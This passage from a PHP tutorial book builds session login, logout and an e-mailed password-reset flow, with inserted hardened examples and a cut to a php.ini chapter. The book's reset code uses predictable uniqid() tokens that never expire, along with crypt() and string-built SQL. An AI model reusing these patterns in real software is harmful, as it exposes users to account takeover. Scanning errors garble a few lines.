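    $found = $stmt->fetch();    // true for a row, null when none matches
    $stmt->close();

    // The password is verified exactly as submitted. Escaping it first
    // would alter passwords that contain quotes or backslashes, so they
    // would no longer match the hash stored at registration.
    // password_verify() also accepts hashes that crypt() produced, so
    // accounts created by Listing 4-6 keep working.
    if (!$found || !password_verify($password, $dbHash)) {
        // One log line and one return path for both "no such user" and
        // "wrong password", so the caller cannot tell them apart.
        error_log("Login failed for {$email}");
        return false;
    }

    // Move older hashes to the current default algorithm while the
    // plain-text password is available.
    if (password_needs_rehash($dbHash, PASSWORD_DEFAULT)) {
        $newHash = password_hash($password, PASSWORD_DEFAULT);
        $upd = $mysqli->prepare(
            "UPDATE Customer SET password = ? WHERE id = ?");
        if ($upd) {
            $upd->bind_param("si", $newHash, $id);
            $upd->execute();
            $upd->close();
        }
    }

    // Issue a new session ID when the user becomes authenticated, so an
    // ID that was known before login is worthless afterwards.
    if (session_id() == "") {
        session_start();
    }
    session_regenerate_id(true);

    $_SESSION['id'] = $id;
    $_SESSION['email'] = $email;
    $_SESSION['firstName'] = $firstName;
    $_SESSION['isLoggedIn'] = true;
    return true;
}

// Usage inside login-process.php, after the required-field checks:
//   $mysqli = new mysqli(DBHOST, DBUSER, DBPASS, DB);
//   if (authenticateUser($mysqli, $_POST['email'], $_POST['password'])) { ... }
```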

Building the login-process PHP file

Now that the User class is ready to go, you can build the login-process.php
file. The login-process.php file is the login form’s action. When
someone clicks the Submit Query button to log in, he will be sent to this file,
which will do the business of authenticating him and sending him on to the
appropriate place.

The login-process code is shown in Listing 4-11. 


Listing 4-11: Code for the login-process File 

<?php
require_once('functions.inc');

//prevent access if they haven't submitted the form.
if (!isset($_POST['submit'])) {
    die(header("Location: login.php"));
}

$_SESSION['formAttempt'] = true;

if (isset($_SESSION['error'])) {
    unset($_SESSION['error']);
}

$_SESSION['error'] = array();

$required = array("email","password");

//Check required fields
foreach ($required as $requiredField) {
    if (!isset($_POST[$requiredField]) || $_POST[$requiredField] == "") {
        $_SESSION['error'][] = $requiredField . " is required.";
    }
}

if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) {
    $_SESSION['error'][] = "Invalid e-mail address";
}

if (count($_SESSION['error']) > 0) {
    die(header("Location: login.php"));
} else {
    $user = new User;
    if ($user->authenticate($_POST['email'],$_POST['password'])) {
        unset($_SESSION['formAttempt']);
        die(header("Location: authenticated.php"));
    } else {
        $_SESSION['error'][] = "There was a problem with your username or password.";
        die(header("Location: login.php"));
    }
}

?>

The code from the login-process file shares much of the same logic from
the register-process file earlier in the chapter. That initial logic is
analyzed in Chapter 3.

New for the login-process is the instantiation of the User class and the use
of the User class for authentication. The authenticate() function in the
User class returns true if the user was authenticated; therefore, it can be
wrapped in an if() conditional. A user who logs in successfully gets
redirected to a page called authenticated.php. If the login is unsuccessful,
the user gets sent back to login.php with an error.

Adding Authenticated Pages

Your application has the capability to register users and to have them log in.
It uses a class for handling user information, but there’s really nothing for
users to do once they log in. At this point, you don’t even have an
authenticated page built! It’s time to fix that.


Building a protected page

Pages that need to be protected — in other words, those that a user needs
to be logged in to in order to access them — can be built easily with the help
of the User class. Whenever a user is logged in, a property called isLoggedIn
gets set to Boolean true. That means you can effectively check whether a
user is logged in on any page by checking that property.


Session is used heavily as part of the application. You might be tempted to
access things like the isLoggedIn parameter right from the session. However,
best practice is to use the object-oriented interface (the User class) whenever
possible. There are times when the object-oriented interface may need to do
additional checks to see if a user is logged in (or whatever other property is
being requested). Therefore, by using the object-oriented interface you’re
keeping in line with the abstraction techniques and will allow the greatest
flexibility later.


The authenticated page used by the login-process file is called
authenticated.php. The code for authenticated.php is in Listing 4-12.


Listing 4-12: Code for an Authenticated Page 

<?php
require_once("functions.inc");
$user = new User;
if (!$user->isLoggedIn) {
    die(header("Location: login.php"));
}
?>
<!doctype html>
<html>
<head>
<title>Super Secret Authenticated Page</title>
</head>
<body>
<div>
<?php print "Welcome {$user->firstName}<br />\n"; ?>
</div>
<div>
<a href="logout.php">Click here to logout</a>
</div>
</body>
</html>

The heart of the page’s code is right at the top, where a new user is
instantiated and the isLoggedIn property is checked. If the isLoggedIn property
is false, the user is redirected back to the login page. If the isLoggedIn
property is true, then the page’s execution continues and the user is
welcomed to the page, as shown in Figure 4-5.

Figure 4-5: An authenticated page.

You can see that the authenticated page refers to a logout.php file. That
file has yet to be built.

Essentially, any page that needs to be protected should have this code 
added to it: 

<?php 

require_once("functions.inc") ; 

$user = new User; 

if (!$user->isLoggedIn) {

die(header("Location: login.php")); 

} 


?> 

With that code (and the accompanying class and support files), a user can’t
access the page unless the isLoggedIn property is set to true.

Building a logout page

A page to securely log out of the application is just as important as logging
in. The page needs to do the obvious, change the isLoggedIn property to
false, but should also clear any user data out of the session. And for an
extra layer of security, the session itself can be destroyed, as recommended
in the PHP manual.

The actual logout function should be added to the User class, since that’s 
essentially a part of the user-related duties. The logout functionality might 
also be used from multiple pages, thus making it a good candidate for 
abstraction into a common area. There are two tasks then: 

♦ Build the logout function and add it to the User class. 

♦ Build the logout page itself. 

You tackle both of them next. 

Creating a logout function 

A logout function not only needs to set the isLoggedIn property to false,
but also needs to clear the session variables related to the login. Doing this
helps to prevent the user from potentially still being logged in or having his
information remain in the browser.

The PHP manual’s page for session_destroy contains some helpful code
for completely removing the session, which you adapt for your logout
function; no point reinventing the wheel here.

You can view the PHP manual’s session_destroy page at
http://php.net/manual/en/function.session-destroy.php.

Listing 4-13 shows the logout function. This function is added to the
ClassUser.php file, within the class (just before the closing brace to end
the User class).


Listing 4-13: The Logout Function 

public function logout() {
    $this->isLoggedIn = false;
    if (session_id() == '') {
        session_start();
    }
    $_SESSION['isLoggedIn'] = false;
    //blank out and remove every session variable
    foreach ($_SESSION as $key => $value) {
        $_SESSION[$key] = "";
        unset($_SESSION[$key]);
    }
    $_SESSION = array();
    if (ini_get("session.use_cookies")) {
        $cookieParameters = session_get_cookie_params();
        //an empty value and an expiry time in the past expire the session cookie
        setcookie(session_name(), '', time() - 28800,
            $cookieParameters['path'], $cookieParameters['domain'],
            $cookieParameters['secure'], $cookieParameters['httponly']
        );
    } //end if
    session_destroy();
} //end function logout


This function sets the isLoggedIn property to false and then proceeds
to clear all session variables. If HTTP cookies are used for the session, a new
cookie is sent to the browser, effectively expiring the cookie.

Building the logout page

When users click the Logout link anywhere on the site, they’ll be sent to a
page called logout.php, which performs the actual logout and sends the
users back to the login page. The code for the logout page, called
logout.php, is only four lines and is shown in Listing 4-14.


Listing 4-14: The Logout Page 

<?php 

require_once("functions.inc"); 

$user = new User; 

$user->logout(); 

die(header("Location: login.php")); 

?> 

With that code in place, a user can register, log in, and log out of the
application. However, two areas should be enhanced. First, if a user goes to the
login page, you should call the logout function; second, you should also set
the isLoggedIn property to false whenever the authenticate method is
called.

Enhancing logout

When users go to the login page, you should make sure that they’re really 
logged out. If you don’t, a user could easily navigate there, see an empty 
form, and think she’s logged out. In reality, her session is still going, so if 
another user walked up to the first user’s computer, the second user could 
navigate through the first user’s history and get into the application. Here’s 
a demonstration of that behavior. 

This demonstration begins by logging in to the application, shown in Figure 4-6. 


Figure 4-6: Logging in to the application.

With the correct credentials, you’re logged in, as shown in Figure 4-7.

Figure 4-7: Logged in to the application.

Without clicking logout, simply clicking the Back button in the browser goes
back to the login.php page. The login.php page is empty, as shown in
Figure 4-8, and the user might think that he is now logged out.




Figure 4-8: The login page, accessed from browser history.

However, using the Forward button or manually entering the authenticated.php
page reveals that the user is still logged in, as shown in Figure 4-9.

Figure 4-9: Still logged in when accessed through browser history.



Luckily, the fix for this is rather easy. Adding a call to the logout method
to the top of the login page solves the issue. Any time the login.php page
is accessed, the user will be logged out. While this might catch a user who
mistakenly accesses the login page again, resulting in her having to log in
again, it’s better than the alternative of allowing unauthorized access to the
application.

The top of the login.php page, prior to the <!doctype html>, now looks
like this:

<?php 

require_once("functions.inc"); 

$user = new User; 

$user->logout(); 

?> 

One final enhancement is to the authenticate method within ClassUser.php.
The isLoggedIn session variable and property should be set to false any
time a user tries to authenticate. To accomplish that task, add the following
code to the top of the authenticate method:

if (session_id() == "") {
    session_start();
}
$_SESSION['isLoggedIn'] = false;
$this->isLoggedIn = false;


Adding E-mail Functionality 

Users forget their passwords. Sometimes they even forget their usernames, 
but because your application uses an e-mail address as the username, that 
scenario is less likely to happen (hopefully). You can add the capability for 
a user to reset his password. Doing so involves some additional database 
work and new pages, so we tell you how to do that here. Sending the actual 
e-mail is rather trivial; it’s all the stuff surrounding password resets that gets 
a bit more complex. 

The overall flow for a password reset on this site will call for a reset page,
where users can enter their e-mail address. When submitted, the form will
look up the e-mail address to see if it’s a valid account and will then create a
unique URL for the password reset. This unique URL will contain a
pseudorandom string of characters and will also be stored in a database table on
the server.

When the user receives the e-mail response to the request for a password 
reset, she follows the link with the unique URL. The user then fills in her 
e-mail address again, along with her new password. This information is 
looked up in the database, and the random string is compared to the one 
from the user, along with her e-mail address. If both match, then you can be 
fairly certain that the same person who requested the reset also controls 
that e-mail address and is hopefully then authorized to do a password reset 
for that account. 
Assuming everything checks out, the password is reset and the user can log
in with the new password immediately. You build this functionality next.

Building the password reset database

The database table for the password reset will store the unique random 
characters for the URL, the ID of the e-mail address being reset, the date the 
reset request was received, and whether the reset request is active. 

The CREATE statement looks like this: 

CREATE TABLE resetPassword (
    id INT NOT NULL PRIMARY KEY AUTO_INCREMENT,
    email_id INT,
    pass_key VARCHAR(255),
    date_created DATETIME,
    status VARCHAR(255)
);

The status field might be used at a later date to set old reset requests to
inactive. Notice that the email_id field is an int type. The unique ID from
the Customer table will be used here, rather than the actual e-mail address.
Doing so saves disk space and maintains data integrity at the same time.

This table should be created prior to continuing. 

Building the password recovery page

The first password recovery page is a simple form that contains only one
field: the e-mail address. The form sends a POST to a file called
email-process.php, following the pattern used throughout the chapter.

Listing 4-15 shows the code for the initial e-mail password page. 


Listing 4-15: Code for the Initial Password Recovery Page 

<?php require_once("functions.inc"); ?>
<!doctype html>
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
<script type="text/javascript" src="email.js"></script>
<link rel="stylesheet" type="text/css" href="form.css">
<title>Forgotten Credentials</title>
</head>
<body>
<form id="emailForm" method="POST" action="email-process.php">
<div>
<fieldset>
<legend>Password Recovery</legend>
<div id="errorDiv">
<?php
    if (isset($_SESSION['error']) && isset($_SESSION['formAttempt'])) {
        unset($_SESSION['formAttempt']);
        print "Errors encountered<br />\n";
        foreach ($_SESSION['error'] as $error) {
            print $error . "<br />\n";
        } //end foreach
    } //end if
?>
</div>
<label for="email">E-mail Address:* </label>
<input type="text" id="email" name="email">
<span class="errorFeedback errorSpan" id="emailError">E-mail is required</span>
<br />
<input type="submit" id="submit" name="submit">
</fieldset>
</div>
</form>
</body>
</html>

When viewed in a browser, the page looks like the one in Figure 4-10. 


Figure 4-10: The page used for password recovery.

Adding a link to the password recovery page

The password recovery page should be linked from the login page, so
that users can get there easily. The following code should be added to the
login.php page immediately above the closing </fieldset> tag:

<br />
<a href="emailpass.php">Forgot your password?</a>

Figure 4-11 shows the resulting page. 


Figure 4-11: Adding a link to the forgotten password page.

Adding JavaScript

The password recovery page uses its own JavaScript validation, shown in 
Listing 4-16. 


Listing 4-16: JavaScript for Password Recovery Validation 

$(document).ready(function() {
    //the form in Listing 4-15 has the id emailForm
    $("#emailForm").submit(function(e) {
        removeFeedback();
        var errors = validateForm();
        if (errors == "") {
            return true;
        } else {
            provideFeedback(errors);
            e.preventDefault();
            return false;
        }
    });

    function validateForm() {
        var errorFields = new Array();
        //Check required fields have something in them
        if ($('#email').val() == "") {
            errorFields.push('email');
        }
        //very basic e-mail check, just an @ symbol after at least one character;
        //the authoritative check is filter_var() in email-process.php
        if ($('#email').val() != "" && $('#email').val().indexOf("@") < 1) {
            errorFields.push('email');
        }
        return errorFields;
    } //end function validateForm

    function provideFeedback(incomingErrors) {
        for (var i = 0; i < incomingErrors.length; i++) {
            $("#" + incomingErrors[i]).addClass("errorClass");
            $("#" + incomingErrors[i] + "Error").removeClass("errorFeedback");
        }
        $("#errorDiv").html("Errors encountered");
    }

    function removeFeedback() {
        $("#errorDiv").html("");
        $('input').each(function() {
            $(this).removeClass("errorClass");
        });
        $('.errorSpan').each(function() {
            $(this).addClass("errorFeedback");
        });
    }
});


Building the success page

When a user fills out the form to reset his password, assuming he has done it
successfully, he gets sent to a page called email-success.php. Listing 4-17
shows the code for that page.


Listing 4-17: The Password Recovery E-Mail Success Page 

<!doctype html>
<html>
<head>
<title>Success</title>
</head>
<body>
<div>
Password reset instructions will be e-mailed to you
</div>
<div>
<a href="login.php">Click here to login</a>
</div>
</body>
</html>


Building the password reset page

The actual password reset form contains fields for the e-mail address and
passwords. Users access it when they follow a link in their e-mail. (We show
that behind-the-scenes code later.) For now, Listing 4-18 shows the code for
the password reset page, called reset.php.

Listing 4-18: Password Reset Page

<?php
require_once("functions.inc");
$invalidAccess = true;
if (isset($_GET['user']) && $_GET['user'] != "") {
    $invalidAccess = false;
    $hash = $_GET['user'];
}
//if they've attempted the form but had a problem, we need to allow them in.
if (isset($_SESSION['formAttempt']) && $_SESSION['formAttempt'] == true) {
    $invalidAccess = false;
    $hash = $_SESSION['hash'];
}
if ($invalidAccess) {
    die(header("Location: login.php"));
}
?>
<!doctype html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="form.css">
<title>Reset Password</title>
</head>
<body>
<form id="loginForm" method="POST" action="reset-process.php">
<div>
<fieldset>
<legend>Reset Password</legend>
<div id="errorDiv">
<?php
    if (isset($_SESSION['error']) && isset($_SESSION['formAttempt'])) {
        unset($_SESSION['formAttempt']);
        print "Errors encountered<br />\n";
        foreach ($_SESSION['error'] as $error) {
            print $error . "<br />\n";
        } //end foreach
    } //end if
?>
</div>
<label for="email">E-mail Address:* </label>
<input type="text" id="email" name="email">
<span class="errorFeedback errorSpan" id="emailError">E-mail is required</span>
<br />
<label for="password1">Password:* </label>
<input type="password" id="password1" name="password1">
<span class="errorFeedback errorSpan" id="password1Error">Password is required</span>
<br />
<label for="password2">Password:* </label>
<input type="password" id="password2" name="password2">
<span class="errorFeedback errorSpan" id="password2Error">Passwords don't match</span>
<br />
<?php
    //$hash arrives from the URL or the session, so encode it before writing it into the page
    $safeHash = htmlspecialchars($hash, ENT_QUOTES, 'UTF-8');
    print "<input type=\"hidden\" name=\"hash\" value=\"{$safeHash}\">\n";
?>
<input type="submit" id="submit" name="submit">
</fieldset>
</div>
</form>
</body>
</html>

This code creates a form, but prior to doing so it looks to see how the user
arrived at the page. The first thing examined is whether a $_GET index of
'user' is set and is available. If so, it means the user probably arrived by
following a link in her e-mail. The 'user' index contains the unique value
generated by your program (that you see later).

If the $_GET['user'] variable is not available, next look to see if the user
already tried submitting the form and had a problem. The problem might
be as simple as the passwords he entered don’t match. Regardless, if he has
attempted to fill out the form, the formAttempt index of $_SESSION will be
set. If it is, then you allow the user to continue.

If neither $_GET['user'] nor $_SESSION['formAttempt'] is available,
then the user probably shouldn’t be here, so you redirect him away.

Assuming that the user should be here and fills out the form correctly, you
submit the form’s contents to a file called reset-process.php.

Building the success page

Like other pages, if the user fills the form out correctly, he gets sent to a
success page, this time reset-success.php, shown in Listing 4-19.


Listing 4-19: The Reset Success Page 

<!doctype html>
<html>
<head>
<title>Reset Success</title>
</head>
<body>
<div>
Your password has been reset
</div>
<div>
<a href="login.php">Click here to login</a>
</div>
</body>
</html>

Building the process files

Both the initial password recovery page and the reset page have their own
processing files that take care of the work of actually e-mailing and resetting
passwords, respectively. Actually, the process pages call the User class for
the real work, but process pages are handy for validation and handling
business rule logic. Keep reading for instructions on how to create these two
files.

Creating the password recovery process file

The password recovery processing file, called email-process.php, is
shown in Listing 4-20.

Listing 4-20: The Password Recovery Process File

<?php 

require_once('functions.inc'); 

//prevent access if they haven't submitted the form, 
if (!isset($_POST['submit'])) { 

die(header("Location: login.php")); 

} 

$_SESSION['formAttempt'] = true; 

if (isset($_SESSION['error']) ) { 

unset($_SESSION['error']); 

} 

$_SESSION['error'] = array();

$required = array("email"); 

//Check required fields 
foreach ($required as $requiredField) { 
if (!isset($_POST[$requiredField]) || $_POST[$requiredField] == "") {

$_SESSION['error'][] = $requiredField . " is required.";

} 

} 

if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) { 

$_SESSION['error'][] = "Invalid e-mail address"; 

} 

if (count($_SESSION['error']) >0) { 

die(header("Location: emailpass.php")); 

} else { 

$user = new User; 

if ($user->emailPass($_POST['email'])) { 
unset($_SESSION['formAttempt']); 
die(header("Location: email-success.php")); 

} else { 

$_SESSION['error'][] = "There was a problem locating the e-mail address.";

die(header("Location: emailpass.php")); 

} 

} 

?> 

There’s not much complexity involved in this file — at least none that you
haven’t seen a few times already. Much of the detail involves validation
logic. Assuming everything is valid, the User class is instantiated and the
emailPass() method is called. You build that later.

Creating the reset process file

The reset process file follows the same pattern as the e-mail process file. 
Listing 4-21 shows the code for the reset process file. 


Listing 4-21: The Reset Process File 

<?php
require_once('functions.inc');
//prevent access if they haven't submitted the form.
if (!isset($_POST['submit'])) {
    die(header("Location: login.php"));
}
$_SESSION['formAttempt'] = true;
if (isset($_SESSION['error'])) {
    unset($_SESSION['error']);
}
$_SESSION['error'] = array();
$required = array("email","password1","password2");
//Check required fields
foreach ($required as $requiredField) {
    if (!isset($_POST[$requiredField]) || $_POST[$requiredField] == "") {
        $_SESSION['error'][] = $requiredField . " is required.";
    }
}
if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) {
    $_SESSION['error'][] = "Invalid e-mail address";
}
if (count($_SESSION['error']) > 0) {
    die(header("Location: reset.php"));
} else {
    $user = new User;
    if ($user->validateReset($_POST)) {
        unset($_SESSION['formAttempt']);
        die(header("Location: reset-success.php"));
    } else {
        //compare with ==; a single = would assign the value and always take this branch
        if ($user->errorType == "nonfatal") {
            $_SESSION['hash'] = $_POST['hash'];
            $_SESSION['error'][] = "There was a problem with the form.";
            die(header("Location: reset.php"));
        } else {
            $_SESSION['error'][] = "There was a problem with the form.";
            die(header("Location: emailpass.php"));
        }
    }
}
?>

One new item in this file is the concept of an error type. Specifically, the
application now defines the type of error encountered as being fatal, meaning that
the processing shouldn’t continue, and nonfatal, meaning the user can be
alerted to the issue and possibly fix it. You can see this reflected in the check
for errorType in the code. If it’s a nonfatal error, then you keep the unique
ID in session and let the user try again. If you notice what you believe to be
a fatal error, then you don’t let the user try again. An example of a fatal error
might be something that you detect as a possible attempt to hack into the
application. You don’t want to allow the user to continue in that case, and you
might take other action, like blocking her IP address, and so on.

For now, use the nonfatal designation in this file and within the User class, 
which you see next. 

Building the class methods

The final step in the password reset process is to build functions or methods
for handling the steps involved. You have already built the pages and the
processing files, so all you have left to do is add methods to the User class.


Adding an e-mail method

The emailPass method, which is called from within the email-process.php
file from Listing 4-20, is responsible for looking up the e-mail address
entered by the user, generating a unique hash, entering that information into
the database, and e-mailing the reset instructions to the user.

A useful abstraction, which is not included in this chapter, would be to
create methods for each of those duties, such as one to return the user’s ID
and another to generate a unique hash.

Listing 4-22 shows the emailPass method, which should be added to the
User class.

Listing 4-22: The emailPass Method

public function emailPass($user) {
    $mysqli = new mysqli(DBHOST,DBUSER,DBPASS,DB);
    if ($mysqli->connect_errno) {
        error_log("Cannot connect to MySQL: " . $mysqli->connect_error);
        return false;
    }
    // first, lookup the user to see if they exist.
    $safeUser = $mysqli->real_escape_string($user);
    $query = "SELECT id,email FROM Customer WHERE email = '{$safeUser}'";
    if (!$result = $mysqli->query($query)) {
        $_SESSION['error'][] = "Unknown Error";
        return false;
    }
    if ($result->num_rows == 0) {
        $_SESSION['error'][] = "User not found";
        return false;
    }
    $row = $result->fetch_assoc();
    $id = $row['id'];
    $hash = uniqid("",TRUE);
    $safeHash = $mysqli->real_escape_string($hash);
    $insertQuery = "INSERT INTO resetPassword (email_id,pass_key,date_created,status) " .
        " VALUES ('{$id}','{$safeHash}',NOW(),'A')";
    if (!$mysqli->query($insertQuery)) {
        error_log("Problem inserting resetPassword row for " . $id);
        $_SESSION['error'][] = "Unknown problem";
        return false;
    }
    $urlHash = urlencode($hash);
    $site = "http://localhost";
    $resetPage = "/reset.php";
    $fullURL = $site . $resetPage . "?user=" . $urlHash;
    //set up things related to the e-mail
    $to = $row['email'];
    $subject = "Password Reset for Site";
    $message = "Password reset requested for this site.\r\n\r\n";
    $message .= "Please go to this link to reset your password:\r\n";
    $message .= $fullURL;
    $headers = "From: webmaster@example.com\r\n";
    mail($to,$subject,$message,$headers);
    return true;
} //end function emailPass
The PHP mail() function is used in the emailPass method. This built-in
function accepts four arguments: the destination (To) for the e-mail, the subject
of the e-mail, the actual message itself, and any additional headers. Those
additional headers include things like the From: header that you typically
see in an e-mail, but can also include things like the Reply-To: header, and
CC and BCC headers too.

Creating the validation method

The validateReset() method is called from the reset-process file and
has the task of validating everything sent by the user for this request and
also carrying out the task of resetting the password. Listing 4-23 shows the
validateReset() method, which should be added to the User class.


Listing 4-23: The validateReset Method 

public function validateReset($formInfo) {
    $pass1 = $formInfo['password1'];
    $pass2 = $formInfo['password2'];
    if ($pass1 != $pass2) {
        $this->errorType = "nonfatal";
        $_SESSION['error'][] = "Passwords don't match";
        return false;
    }
    $mysqli = new mysqli(DBHOST,DBUSER,DBPASS,DB);
    if ($mysqli->connect_errno) {
        error_log("Cannot connect to MySQL: " . $mysqli->connect_error);
        return false;
    }
    $decodedHash = urldecode($formInfo['hash']);
    $safeEmail = $mysqli->real_escape_string($formInfo['email']);
    $safeHash = $mysqli->real_escape_string($decodedHash);
    $query = "SELECT c.id as id, c.email as email FROM Customer c, resetPassword r WHERE " .
        "r.status = 'A' AND r.pass_key = '{$safeHash}' " .
        " AND c.email = '{$safeEmail}' " .
        " AND c.id = r.email_id";
    if (!$result = $mysqli->query($query)) {
        $_SESSION['error'][] = "Unknown Error";
        $this->errorType = "fatal";
        error_log("database error: " . $formInfo['email'] . " - " . $formInfo['hash']);
        return false;
    } else if ($result->num_rows == 0) {
        $_SESSION['error'][] = "Link not active or user not found";
        $this->errorType = "fatal";
        error_log("Link not active: " . $formInfo['email'] . " - " . $formInfo['hash']);
        return false;
    } else {
        $row = $result->fetch_assoc();
        $id = $row['id'];
        if ($this->_resetPass($id,$pass1)) {
            return true;
        } else {
            $this->errorType = "nonfatal";
            $_SESSION['error'][] = "Error resetting password";
            error_log("Error resetting password: " . $id);
            return false;
        }
    }
} //end function validateReset

The validateReset method first checks to see if the passwords match. No
use continuing if they don’t. A complex query is then built using the
information entered. Here’s the select statement:

SELECT c.id as id, c.email as email
FROM Customer c, resetPassword r
WHERE
    r.status = 'A'
    AND r.pass_key = '{$safeHash}'
    AND c.email = '{$safeEmail}'
    AND c.id = r.email_id

The SELECT statement looks to retrieve the ID and e-mail address from the
Customer table. Each of those fields is aliased, which makes accessing them
programmatically slightly less complex. The tables Customer and
resetPassword are themselves aliased as c and r, respectively. Doing so helps to
uniquely identify any fields that might share the same column name in each
table.

The WHERE clause looks for the status of A (Active) in the resetPassword
table and looks for a pass_key equal to the one passed in from the user’s
form, along with an e-mail address equal to that passed in from the user’s
form. Finally, the tables are joined by their common column, which is the
Customer table’s id column and the resetPassword table’s email_id
column.

If all those elements align, then you know that you have a valid and active
password reset occurring. If nothing is returned from this query, then you 
know that either the e-mail address doesn’t exist or isn’t associated with the 
hash being passed in. 



Assuming that the attempt is valid, a private method, _resetPass, is called. 
Listing 4-24 shows the code for the _resetPass method. 

A private method is one that can only be accessed from within the class 
itself. 


Listing 4-24: The resetPass method 

private function _resetPass($id,$pass) { 

$mysqli = new mysqli(DBHOST,DBUSER,DBPASS,DB); 
if ($mysqli->connect_errno) { 

error_log("Cannot connect to MySQL: " . 
$mysqli->connect_error); 

return false; 

} 

$safeUser = $mysqli->real_escape_string($id); 

$newPass = crypt($pass); 

$safePass = $mysqli->real_escape_string($newPass); 
$query = "UPDATE Customer SET password = 

'{$safePass}' " . 

"WHERE id = '{$safeUser}'"; 
if (!$mysqli->query($query)) { 

return false; 

} else { 

return true; 

} 

} //end function _resetPass 

The code from Listing 4-24 performs no validation and can reset any password, 
given the ID. If the password reset is successful, true is returned. 

Other changes to the User class 

One final change to the User class is to add a property for the errorType. 
The following code is added to the class definition: 

public $errorType = "fatal"; 

With that, you can now create an account, log in, and reset your password 
all with the help of fewer than 1,500 lines of code, and PHP, of course. 
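
The reset-token handling done by emailPass(), validateReset() and _resetPass(), as an added example that is not the book's code: the token comes from random_bytes() rather than uniqid(), only a SHA-256 digest of it is stored, it expires and can be used once, queries use bound parameters, and the new password goes through password_hash(). Assumptions: PHP 7.1+ with pdo_sqlite, an in-memory SQLite database standing in for the MySQL tables, a Unix-timestamp date_created, a one-hour lifetime, the status value 'I' for inactive, and the hypothetical function names makeDb, createResetToken and redeemResetToken.

```php
<?php
// Added example, not the book's code. Assumes PHP 7.1+ with pdo_sqlite; an in-memory
// SQLite database stands in for the chapter's MySQL Customer and resetPassword tables.
declare(strict_types=1);

const RESET_TTL_SECONDS = 3600; // assumption: a reset link is valid for one hour

function makeDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE Customer (id INTEGER PRIMARY KEY, email TEXT UNIQUE, password TEXT)");
    // date_created holds a Unix timestamp here so the age check is plain arithmetic
    $db->exec("CREATE TABLE resetPassword (id INTEGER PRIMARY KEY AUTOINCREMENT,
        email_id INT, pass_key VARCHAR(255), date_created INTEGER, status VARCHAR(255))");
    return $db;
}

// Counterpart of emailPass(): returns the token to put in the e-mailed URL,
// or null when the address has no account.
function createResetToken(PDO $db, string $email, int $now): ?string {
    $find = $db->prepare("SELECT id FROM Customer WHERE email = ?");
    $find->execute([$email]);
    $id = $find->fetchColumn();
    if ($id === false) {
        return null;
    }
    // Retire any link still outstanding for this account ('I' = inactive, an assumed value).
    $db->prepare("UPDATE resetPassword SET status = 'I' WHERE email_id = ? AND status = 'A'")
       ->execute([$id]);
    // 256 bits from the operating system's CSPRNG; uniqid() is built from the current time.
    $token = bin2hex(random_bytes(32));
    // Store only a digest, so a leaked table does not hand out usable reset links.
    $db->prepare("INSERT INTO resetPassword (email_id, pass_key, date_created, status)
                  VALUES (?, ?, ?, 'A')")
       ->execute([$id, hash('sha256', $token), $now]);
    return $token;
}

// Counterpart of validateReset() and _resetPass().
function redeemResetToken(PDO $db, string $email, string $token, string $newPass, int $now): bool {
    $find = $db->prepare("SELECT r.id AS rid, c.id AS cid, r.date_created AS created
        FROM Customer c JOIN resetPassword r ON c.id = r.email_id
        WHERE r.status = 'A' AND r.pass_key = ? AND c.email = ?");
    $find->execute([hash('sha256', $token), $email]);
    $row = $find->fetch(PDO::FETCH_ASSOC);
    if ($row === false || $now - (int) $row['created'] > RESET_TTL_SECONDS) {
        return false; // unknown, already used, or expired
    }
    $db->beginTransaction();
    // Claim the row first: of two concurrent requests only one sees rowCount() === 1.
    $claim = $db->prepare("UPDATE resetPassword SET status = 'I' WHERE id = ? AND status = 'A'");
    $claim->execute([$row['rid']]);
    if ($claim->rowCount() !== 1) {
        $db->rollBack();
        return false;
    }
    $db->prepare("UPDATE Customer SET password = ? WHERE id = ?")
       ->execute([password_hash($newPass, PASSWORD_DEFAULT), $row['cid']]);
    $db->commit();
    return true;
}

// Constructed sample data and clock values.
$db = makeDb();
$db->prepare("INSERT INTO Customer (email, password) VALUES (?, ?)")
   ->execute(['user@example.com', password_hash('old-passphrase', PASSWORD_DEFAULT)]);
$t0 = 1700000000;

$token = createResetToken($db, 'user@example.com', $t0);
$cases = [
    'guessed token'        => ['not-the-token', $t0 + 60],
    'e-mailed token'       => [$token, $t0 + 60],
    'same token, replayed' => [$token, $t0 + 120],
];
foreach ($cases as $label => [$candidate, $when]) {
    $ok = redeemResetToken($db, 'user@example.com', $candidate, 'N3w-passphrase', $when);
    printf("%-24s %s\n", $label, $ok ? 'accepted' : 'rejected');
}
$late = createResetToken($db, 'user@example.com', $t0);
$ok = redeemResetToken($db, 'user@example.com', $late, 'N3w-passphrase', $t0 + RESET_TTL_SECONDS + 1);
printf("%-24s %s\n", 'token past its lifetime', $ok ? 'accepted' : 'rejected');
```

Hashes produced by password_hash() are checked at login with password_verify(), so the authenticate method would need to use that function if this approach replaces crypt().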
Chapter 1: Configuring PHP


In This Chapter 

Understanding the php.ini 

Understanding common changes in the php.ini 


■ iiyhen PHP is installed, certain default settings are selected. These 
WW settings are based on widely used common values. For instance, the 
default PHP settings might display errors to the screen depending on the 
system. There are times when you might need to change these settings. To 
do so, you use the configuration file called php. ini. This chapter looks at 
the php. ini in more detail and shows some of the common configuration 
changes that you might perform on your system. 


Understanding the php.ini 

As discussed in Book 1, Chapter 3, the behavior of PHP is controlled through 
an initialization file called php. ini. Settings such as how sessions are 
handled, how errors are displayed, and what modules are available are all 
controlled through the php. ini file. 

The actual location of the php. ini file varies depending on the operating 
system and how PHP was installed. Refer to Book 1, Chapter 3, for information 
on locating the php. ini or search your system for the file. 



Working with the php.ini 

The php.ini file is a plain text file and should be edited with a plain text 
editor such as Notepad, Textpad, or Vi. 

A good practice is to make a copy of the current php.ini before you start 
your edits. Doing so makes it easy to revert to the original copy if you discover 
your changes caused a problem. 

When you make a change to the php.ini, you should reload the Apache 
web server in order to activate the changes. 

Making changes outside of the php.ini 

Changes you make to the php.ini apply globally, to all sites on a server. 
However, there are times when you want to apply a change either to a site 
or to an individual page. When this occurs, you have several options, two of 
which we discuss here. 


Using .htaccess or Apache configuration 

Some systems allow you to use an .htaccess file to set PHP options. 
Alternatively, if you control the server you can make a site-level change 
within the Apache VirtualHost container. 

